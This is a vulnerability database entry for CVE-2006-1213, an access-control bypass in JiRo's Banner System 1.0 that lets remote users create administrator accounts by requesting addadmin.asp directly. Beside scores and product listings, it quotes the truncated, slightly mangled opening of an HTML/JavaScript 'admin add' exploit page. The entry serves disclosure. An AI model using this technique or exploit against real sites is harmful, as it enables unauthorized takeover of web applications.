7.5
CVSSv2

CVE-2006-1213

Published: 14/03/2006 Updated: 18/10/2018
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

JiRo's Banner System Experience and Professional 1.0 and previous versions allows remote malicious users to bypass access restrictions and gain privileges via a direct request to certain scripts in the files directory, as demonstrated by using addadmin.asp to create a new administrator account.

Vulnerable Product Search on Vulmon Subscribe to Product

jiro banner system 1.0_experience

jiro banner system 1.0_professional

Exploits

<html> <title>Jiros Banner Experience Pro Unauthorized Admin Add Exploit</title> <body bgcolor="#000000"> <style> xpl {font-family:tahoma; font-size:11px; text-decoration: none;} </style> <script language="JavaScript"> function jbxpl() { if (documentxpltvictimvalue=="") { alert("Please enter site! ...